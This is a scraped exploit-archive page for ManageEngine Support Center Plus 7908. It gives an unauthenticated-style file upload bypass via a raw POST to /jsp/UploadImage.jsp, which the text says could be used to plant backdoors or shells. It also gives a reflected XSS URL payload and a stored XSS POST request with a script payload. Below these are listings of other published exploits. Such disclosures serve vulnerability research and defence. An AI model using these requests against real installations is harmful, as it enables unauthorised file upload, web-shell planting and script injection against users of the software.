Menu

Search for hundreds of thousands of exploits

"ManageEngine Support Center Plus 7908 - Multiple Vulnerabilities"

Author

Exploit author

xistence

Platform

Exploit platform

jsp

Release date

Exploit published date

2012-10-17

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
+--------------------------------------------------------------------------------------------------------------------------------+
# Exploit Title     : ManageEngine Support Center Plus <=7908 Multiple Vulnerabilities
# Date              : 06-03-2012
# Author            : xistence (xistence<[AT]>0x90.nl)
# Software link     : http://www.manageengine.com/products/support-center/64045241/ManageEngine_SupportCenter_Plus_7_9_0_SP-0_8_0.ppm
# Vendor site       : http://www.manageengine.com/
# Version           : 7908 and lower
# Tested on         : CentOS 5.x
+--------------------------------------------------------------------------------------------------------------------------------+


1) Arbitrary File Upload (File Extension Verification Bypass)

It's possible to bypass the image extension check in the ticket creation editor. Normally you would go to Requests -> New Request -> select the "Insert Image" to upload a picture to be included in the ticket and is restricted to jpg/gif/png files. If you send a POST request directly to the /jsp/UploadImage.jsp?Module=Workorder url you'll be able to upload any file. This might lead to uploading web site files which could be used for malicious actions (backdoors/shells).

Below a sample POST request, note that a valid cookie is needed (and be authenticated) to perform these actions. The POST request uploads a file test.txt with the contents "TEST!"

POST /jsp/UploadImage.jsp?Module=WorkOrder HTTP/1.1
Host: exploitme:8080
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Length: 231
Content-Type: multipart/form-data; boundary=---------------------------135769595918512168611930018855
Content-Length: 231

-----------------------------135769595918512168611930018855
Content-Disposition: form-data; name="img_file"; filename="test.txt"
Content-Type: image/gif

TEST!

-----------------------------135769595918512168611930018855--



In the HTTP response you'll see this:

<script>var formName = parent.document.getElementById("FORMNAME").value;
  var opts = parent.document.forms[formName].INLINEIMAGES.options;
  var imgName = "1340090056957.txt";
  var option = new Option(imgName, imgName);
  option.selected = true;
  opts[opts.length] = option;
  // parent.showImage("WorkOrder","2","1340090056957.txt");
  parent.ZE.activeEditor.previewImage("/inline/"+"WorkOrder"+"/"+"2"+"/"+"1340090056957.txt");//No i18n</script>

Which makes the following url accessable and will show the "TEST!" in clear text:
http://<IP ADDRESS>:8080/inline/WorkOrder/2/1340090056957.txt


2) Reflected XSS

Proof of Concept:
http://<IP ADDRESS>:8080/HomePage.do?fromCustomer=%27;alert%28%22Hello%20World%22%29;%20var%20frompor=%27null


3) Stored XSS vulnerability

How to replicate:

Requests -> New Request
Subject: anything
Description window -> select Edit HTML button -> Insert script code i.e.: <script>alert("Hello World")</script>

POST request headers:

POST /WorkOrder.do HTTP/1.1
Host: exploitme:8080
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 312

reqTemplate=&prodId=0&priority=2&reqID=2&usertypename=Requester&reqName=Guest&category=0&item=0&subCategory=0&title=bla&description=bla%3Cscript%3Ealert%28%22Hello+World%22%29%3C%2Fscript%3E&MOD_IND=WorkOrder&FORMNAME=WorkOrderForm&attach=&attPath=&component=Request&attSize=&attachments=&autoCCList=&addWO=addWO
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2019-11-12 "Atlassian Confluence 6.15.1 - Directory Traversal" webapps jsp max7253
2019-11-12 "Atlassian Confluence 6.15.1 - Directory Traversal (Metasploit)" webapps jsp max7253
2019-09-16 "NetGain EM Plus 10.1.68 - Remote Command Execution" webapps jsp azams
2019-07-26 "Ahsay Backup 7.x - 8.1.1.50 - XML External Entity Injection" webapps jsp "Wietse Boonstra"
2019-07-26 "Ahsay Backup 7.x - 8.1.1.50 - Authenticated Arbitrary File Upload / Remote Code Execution (Metasploit)" webapps jsp "Wietse Boonstra"
2019-07-26 "Ahsay Backup 7.x - 8.1.1.50 - Authenticated Arbitrary File Upload / Remote Code Execution" webapps jsp "Wietse Boonstra"
2019-06-11 "Liferay Portal 7.1 CE GA=3 / SimpleCaptcha API - Cross-Site Scripting" webapps jsp "Valerio Brussani"
2019-06-05 "Zimbra < 8.8.11 - XML External Entity Injection / Server-Side Request Forgery" webapps jsp k8gege
2019-05-10 "dotCMS 5.1.1 - HTML Injection" webapps jsp "Ismail Tasdelen"
2019-03-11 "OpenKM 6.3.2 < 6.3.7 - Remote Command Execution (Metasploit)" webapps jsp AkkuS
Release Date Title Type Platform Author
2015-10-05 "ManageEngine ServiceDesk Plus 9.1 build 9110 - Directory Traversal" webapps jsp xistence
2015-09-14 "ManageEngine OpManager 11.5 - Multiple Vulnerabilities" webapps multiple xistence
2015-09-14 "ManageEngine EventLog Analyzer < 10.6 build 10060 - SQL Execution" webapps multiple xistence
2014-03-19 "Quantum vmPRO 3.1.2 - Local Privilege Escalation" local hardware xistence
2014-03-19 "Array Networks vxAG 9.2.0.34 and vAPV 8.3.2.17 - Multiple Vulnerabilities" webapps hardware xistence
2014-03-19 "Quantum DXi V1000 2.2.1 - Static SSH Key" remote unix xistence
2014-03-19 "Loadbalancer.org Enterprise VA 7.5.2 - Static SSH Key" remote unix xistence
2014-02-05 "Pandora Fms 5.0RC1 - Remote Command Injection" webapps php xistence
2014-01-29 "ManageEngine Support Center Plus 7916 - Directory Traversal" webapps php xistence
2014-01-29 "A10 Networks Loadbalancer - Directory Traversal" webapps hardware xistence
2013-10-04 "Aanval 7.1 build 70151 - Multiple Vulnerabilities" webapps php xistence
2013-09-20 "OpenEMR 4.1.1 Patch 14 - SQL Injection / Privilege Escalation / Remote Code Execution (Metasploit)" remote php xistence
2013-09-20 "Western Digital Arkeia < 10.0.10 - Remote Code Execution (Metasploit)" remote php xistence
2013-09-17 "Western Digital Arkeia Appliance 10.0.10 - Multiple Vulnerabilities" webapps php xistence
2013-09-17 "OpenEMR 4.1.1 Patch 14 - Multiple Vulnerabilities" webapps php xistence
2013-09-03 "TP-Link TD-W8951ND - Multiple Vulnerabilities" webapps hardware xistence
2013-07-25 "Alienvault Open Source SIEM (OSSIM) - Multiple Cross-Site Scripting Vulnerabilities" webapps php xistence
2013-06-26 "Motion - Multiple Vulnerabilities" remote multiple xistence
2013-01-02 "Astium VoIP PBX 2.1 build 25399 - Remote Crash (PoC)" dos linux xistence
2013-01-02 "Astium VoIP PBX 2.1 build 25399 - Multiple Vulnerabilities/Remote Command Execution" webapps php xistence
2012-12-29 "Ubiquiti AirOS 5.5.2 - (Authenticated) Remote Command Execution" remote hardware xistence
2012-12-21 "YeaLink IP Phone SIP-TxxP Firmware 9.70.0.100 - Multiple Vulnerabilities" webapps hardware xistence
2012-10-19 "ManageEngine Security Manager Plus 5.5 build 5505 - Remote SYSTEM SQL Injection (Metasploit)" remote windows xistence
2012-10-19 "ManageEngine Security Manager Plus 5.5 build 5505 - Remote Root/SYSTEM SQL Injection" remote multiple xistence
2012-10-19 "ManageEngine Security Manager Plus 5.5 build 5505 - Directory Traversal" webapps multiple xistence
2012-10-17 "ManageEngine Support Center Plus 7908 - Multiple Vulnerabilities" webapps jsp xistence
2012-04-15 "ManageEngine Support Center Plus 7903 - Multiple Vulnerabilities" webapps multiple xistence
2011-06-23 "ManageEngine Support Center Plus 7.8 Build 7801 - Directory Traversal" webapps jsp xistence 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected